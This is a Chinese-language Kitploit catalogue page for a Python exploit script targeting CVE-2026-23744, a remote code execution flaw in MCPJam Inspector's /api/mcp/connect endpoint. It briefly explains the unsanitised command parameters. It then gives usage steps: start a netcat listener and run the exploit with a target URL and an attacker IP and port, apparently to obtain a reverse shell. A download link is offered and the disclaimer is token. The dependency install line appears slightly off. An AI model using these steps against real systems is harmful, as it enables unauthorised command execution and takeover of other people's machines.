Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-23744-RCE-for-MCPjam-inspector-v1.4.2 — 针对CVE-2026-23744的Python利用脚本,通过向MCPJam Inspector <= 1.4.2中的/api/mcp/connect端点发送精心构造的POST请求,实现远程代码执行。 | Kitploit
工具/GitHubGitHub/srginebras/cve-2026-23744-rce-for-mcpjam-inspector-v1.4.2
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队
GitHubsrginebras/cve-2026-23744-rce-for-mcpjam-inspector-v1.4.2

CVE-2026-23744-RCE-for-MCPjam-inspector-v1.4.2

针对CVE-2026-23744的Python利用脚本,通过向MCPJam Inspector <= 1.4.2中的/api/mcp/connect端点发送精心构造的POST请求,实现远程代码执行。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
12个月前尚未审核

CVE-2026-23744-RCE-for-MCPjam-inspector-v1.4.2

当 /api/mcp/connect 端点默认监听所有网络接口(0.0.0.0)且未能正确清理用户提供的传入 serverConfig JSON 对象中 command 和 args 参数的输入时,MCPJam Inspector <= 1.4.2 中存在一个严重的 RCE 漏洞。

攻击者可以通过向 /api/mcp/connect 发送精心构造的 POST 请求来利用此漏洞,从而以 MCPJam 服务的权限在目标系统上实现任意命令执行。


使用方法

  1. 安装依赖
root@kitploit:~
 pip install request
  1. 使用 nc 启动监听器
root@kitploit:~
sudo nc -lvnp <port>
  1. 启动漏洞利用
root@kitploit:~
python3 CVE-2026-23744.py -u <url> -i <attacker-ip> -p <attacker-port>
  1. 为了更好的使用体验,建议将终端升级为全功能终端,否则无法使用像 ctrl^c 这样的命令。

示例

image image

仅限在受控环境中使用此漏洞利用程序

⚠️自行承担使用风险⚠️

下载工具